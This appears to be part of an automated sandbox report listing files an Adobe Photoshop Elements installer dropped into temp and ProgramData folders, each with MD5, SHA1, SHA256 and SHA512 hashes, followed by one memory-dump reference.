SHA256 406288e48ced388744e5165a1ec4266f419cc409e4a70036e4b15a93af5c42ab
SHA512 a7c6d55f64d91e5d71661e040f4d06d2c873e0b2d2a3b2e52ff60d230a7c7c0924cd0ddc4dc124d53736c934023a27d6ed77c1266732f0b5de5dc75b02715c8b

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\carousel\css\fonts\adobeclean\adobeclean-regular-webfont.woff

MD5 6af297e58edc414ee90c76c2d3ea8678
SHA1 7497d181cd6fe3a4b01a4f8b6ba6a47d3fa54333
SHA256 3e8f59db6dfae287af8dccc0fdf5e15a8aa2a954c2c232bc6c64536e1a27eaa5
SHA512 61e14f8e605c4d2b52c9a874f40e73fde43625bc468ba3c7316e7672cffd05b7c1766c875fc1b48218bd2b6856226645ee9bcb45810eb7121c5dbd0c184b7d0a

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\preserve\appIcon.png

MD5 eb5fdb63686193e55826a8dd77d64412
SHA1 977c4788abf0f274e74281c4da76c0c3d2f26b76
SHA256 1dbcffb6b2837f5c42cc90713f01f7e7e82b45337de78b1204f67e0ad7fa488b
SHA512 c3849cc0a289a36a70e7b4968bc379e118ca80d3e87aff2477fd7fbd514b66cd67e199b17b41277a6f3c8794b88cc69532b233016bfec2ee98d3f0c17dbbc4e8

C:\ProgramData\Adobe\Installer\Icons\PSE_24.0\appIcon2x.png

MD5 2152d117d6e4fdeb0510da1fdceae7e3
SHA1 acd10c0b6653041e6ce4241dccef1445d12e2db8
SHA256 4a95d46dac22aa1477093eb7b5655a73c3c7152a985ab7a5148327e93309f985
SHA512 5a7af9736fc3c7329fc680bbaa80fdd8d74f0d98d2422cc57c64b78a30d3c68f799f5e584cf1d6d283b6e827fc391130484c2726d59c70d97ae2d0774239af2f

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\main.html

MD5 f4b7942d6563727bd614f10da0f38445
SHA1 84f22240f7a5ed1c23b09e8677ac2ac3cd4e26f9
SHA256 e4bedde22ed405d291c746440a824d5f8527fb232e7a6be2ed9a76465d82f8dc
SHA512 f79b24ac78863a4ed87d41f37b2a5bc27017ebc5317f0a305d676090a16aee8a61384b476e7e9a68a024aa8da4784c1bd4f118766caf4450ec97af430e7074af

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\lib\jquery.placeholder.min.js

MD5 e13f16e89fff39422bbb2cb08a015d30
SHA1 e7cacaf84f53997dd096afd1c5f350fd3e7c6ce9
SHA256 24320add10244d1834052c7e75b853aa2d164601c9d09220a9f9ac1f0ae44afe
SHA512 aad811f03f59f799da4b8fc4f859b51c39f132b7ddbffadabe4ec2373bd340617d6fe98761d1fb86d77606791663b387d98a60fba9cee5d99c34f683bcb8d1f9

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\main.js

MD5 a8f9eb478c7512c98ca1ad46dbcc298a
SHA1 454226dc42b911caafc9a1e56d8ad0000bbb7643
SHA256 1df6cbdc80c1df47d93d6e7516a2d7017362413a6b9d93634e143856695c3645
SHA512 ae3198cc6ae739f3009359988f5c090664e5fe8422ad1cf739fe316e66f344c10385d1f841c7b0e3ca9f7997c79d95fa0559386b6dec10641ceb8c290b14f5b3

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\lib\jquery.custom-scrollbar.min.js

MD5 ab3adf4aff09a1c562a29db05795c8ab
SHA1 f6c3f470aea0678945cb889f518a0e9a5ce44342
SHA256 d05e193674c6fc31de0503cbc0b152600f22689ad7ad72adb35fcc7c25d4b01b
SHA512 44dfc748d0bd84f123f9d3f62d5ea137d9128d5bdbe45da9a8666d09039eb179acf0dbb3030e09896fd61e7aa5ae6dfaffe9258d80949a64d0a7e45037791fb4

C:\Users\Admin\AppData\Local\Temp\{453B41AF-E133-4AF9-B9B3-0E2C57C0E7DF}\common.js

MD5 d98f70ffd105672292755a37f173c2ec
SHA1 c0154add295ac052f234a0282a62b704cdd01998
SHA256 257a42f797f140667c81930001e73943bfc243d50bcc775f75d0334a2d2cf2c3
SHA512 1909cc7e4da0949a469852240be2205209968b18b99f7d967bc0231de33d03c7cbaa9578972e30e95e6d7017aebf9cd70a55ba22cdc9d5774d2a237d3eb0971b

memory/3932-469-0x0000000000B60000-0x00000000014E7000-memory.dmp